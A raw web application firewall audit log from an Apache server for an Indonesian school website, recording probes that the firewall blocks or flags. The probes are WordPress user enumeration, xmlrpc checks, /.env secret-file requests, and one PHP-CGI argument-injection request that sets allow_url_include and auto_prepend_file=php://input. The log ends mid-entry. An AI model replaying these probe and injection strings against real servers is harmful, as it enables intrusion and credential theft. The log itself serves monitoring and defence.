proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913267290565 4994 (- - -) Stopwatch2: 1746913267290565 4994; combined=3687, p1=495, p2=2986, p3=26, p4=30, p5=86, sr=64, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1405c48-Z-- --04f33930-A-- [11/May/2025:04:43:16 +0700] aB_IdEEuxCpmyy5aJPlnLwAAABI 103.236.140.4 36154 103.236.140.4 8181 --04f33930-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04f33930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f33930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913396508560 2979 (- - -) Stopwatch2: 1746913396508560 2979; combined=1342, p1=411, p2=886, p3=0, p4=0, p5=44, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f33930-Z-- --cdd0f53a-A-- [11/May/2025:04:43:23 +0700] aB_Iewpy530QiWmSS60w9gAAAFc 103.236.140.4 36378 103.236.140.4 8181 --cdd0f53a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdd0f53a-C-- demo.sayHello --cdd0f53a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd0f53a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913403372980 5719 (- - -) Stopwatch2: 1746913403372980 5719; combined=4249, p1=646, p2=3379, p3=30, p4=34, p5=94, sr=185, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd0f53a-Z-- --b182ab2b-A-- [11/May/2025:04:47:27 +0700] aB_Jb0EuxCpmyy5aJPlpTQAAAAU 103.236.140.4 43618 103.236.140.4 8181 --b182ab2b-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 4.188.112.137 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 4.188.112.137 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b182ab2b-C-- --b182ab2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b182ab2b-E-- --b182ab2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913647246898 5024 (- - -) Stopwatch2: 1746913647246898 5024; combined=3282, p1=537, p2=2712, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b182ab2b-Z-- --5dbbaf01-A-- [11/May/2025:04:56:46 +0700] aB_Lnubs1CLLACKj-_zGywAAAJY 103.236.140.4 33744 103.236.140.4 8181 --5dbbaf01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5dbbaf01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbbaf01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746914206943901 15152 (- - -) Stopwatch2: 1746914206943901 15152; combined=25634, p1=426, p2=820, p3=0, p4=0, p5=12212, sr=73, sw=0, l=0, gc=12176 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbbaf01-Z-- --2bf20112-A-- [11/May/2025:04:56:53 +0700] aB_LpU8xOExV7lPH_Dl2mwAAANM 103.236.140.4 33940 103.236.140.4 8181 --2bf20112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2bf20112-C-- demo.sayHello --2bf20112-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf20112-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746914213299771 7435 (- - -) Stopwatch2: 1746914213299771 7435; combined=5650, p1=564, p2=4825, p3=29, p4=40, p5=113, sr=66, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf20112-Z-- --209ce874-A-- [11/May/2025:05:23:10 +0700] aB_Rzk8xOExV7lPH_DmC2QAAAMs 103.236.140.4 52912 103.236.140.4 8181 --209ce874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.41.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.41.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --209ce874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209ce874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746915790738330 749 (- - -) Stopwatch2: 1746915790738330 749; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209ce874-Z-- --b7367c72-A-- [11/May/2025:05:35:11 +0700] aB_Un-bs1CLLACKj-_zVzwAAAJc 103.236.140.4 46240 103.236.140.4 8181 --b7367c72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b7367c72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7367c72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746916511347811 5135 (- - -) Stopwatch2: 1746916511347811 5135; combined=2150, p1=535, p2=1574, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7367c72-Z-- --f4059a5c-A-- [11/May/2025:05:35:23 +0700] aB_Uqwpy530QiWmSS61H8wAAAEo 103.236.140.4 46640 103.236.140.4 8181 --f4059a5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f4059a5c-C-- demo.sayHello --f4059a5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4059a5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746916523877055 5371 (- - -) Stopwatch2: 1746916523877055 5371; combined=4088, p1=518, p2=3365, p3=33, p4=32, p5=84, sr=64, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4059a5c-Z-- --9ac10648-A-- [11/May/2025:05:52:49 +0700] aB_YwUEuxCpmyy5aJPmLsAAAABQ 103.236.140.4 53682 103.236.140.4 8181 --9ac10648-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac10648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac10648-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746917569754084 2725 (- - -) Stopwatch2: 1746917569754084 2725; combined=1305, p1=430, p2=849, p3=0, p4=0, p5=26, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac10648-Z-- --14fc7545-A-- [11/May/2025:05:52:56 +0700] aB_YyE8xOExV7lPH_DmQAAAAANc 103.236.140.4 53906 103.236.140.4 8181 --14fc7545-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --14fc7545-C-- demo.sayHello --14fc7545-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --14fc7545-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746917576889851 6602 (- - -) Stopwatch2: 1746917576889851 6602; combined=5262, p1=661, p2=4390, p3=41, p4=44, p5=78, sr=77, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14fc7545-Z-- --7433a862-A-- [11/May/2025:05:56:54 +0700] aB_Ztgpy530QiWmSS61SpQAAAEs 103.236.140.4 33176 103.236.140.4 8181 --7433a862-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7433a862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7433a862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746917814435180 2889 (- - -) Stopwatch2: 1746917814435180 2889; combined=1579, p1=516, p2=1034, p3=0, p4=0, p5=29, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7433a862-Z-- --0427ad11-A-- [11/May/2025:05:57:02 +0700] aB_ZvkEuxCpmyy5aJPmODQAAABg 103.236.140.4 33392 103.236.140.4 8181 --0427ad11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0427ad11-C-- demo.sayHello --0427ad11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0427ad11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746917822225747 4583 (- - -) Stopwatch2: 1746917822225747 4583; combined=3362, p1=450, p2=2718, p3=28, p4=27, p5=80, sr=81, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0427ad11-Z-- --d02f552f-A-- [11/May/2025:06:37:10 +0700] aB_jJubs1CLLACKj-_zwswAAAIw 103.236.140.4 53054 103.236.140.4 8181 --d02f552f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d02f552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d02f552f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746920230871209 2404 (- - -) Stopwatch2: 1746920230871209 2404; combined=1236, p1=388, p2=819, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d02f552f-Z-- --5c6a8b2b-A-- [11/May/2025:06:37:18 +0700] aB_jLkEuxCpmyy5aJPmj5AAAAAE 103.236.140.4 53310 103.236.140.4 8181 --5c6a8b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5c6a8b2b-C-- demo.sayHello --5c6a8b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c6a8b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746920238046532 5445 (- - -) Stopwatch2: 1746920238046532 5445; combined=4338, p1=542, p2=3570, p3=35, p4=35, p5=92, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c6a8b2b-Z-- --9fbb3e35-A-- [11/May/2025:06:39:01 +0700] aB_jlebs1CLLACKj-_zxXgAAAJE 103.236.140.4 56894 103.236.140.4 8181 --9fbb3e35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9fbb3e35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fbb3e35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746920341000303 3315 (- - -) Stopwatch2: 1746920341000303 3315; combined=1473, p1=498, p2=945, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fbb3e35-Z-- --1e09ca2c-A-- [11/May/2025:06:39:08 +0700] aB_jnE8xOExV7lPH_DmkUQAAAM4 103.236.140.4 57154 103.236.140.4 8181 --1e09ca2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e09ca2c-C-- demo.sayHello --1e09ca2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e09ca2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746920348006794 6537 (- - -) Stopwatch2: 1746920348006794 6537; combined=4818, p1=590, p2=4005, p3=32, p4=35, p5=94, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e09ca2c-Z-- --d475f540-A-- [11/May/2025:07:02:47 +0700] aB_pJ0EuxCpmyy5aJPmzGAAAABc 103.236.140.4 47150 103.236.140.4 8181 --d475f540-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --d475f540-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d475f540-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id 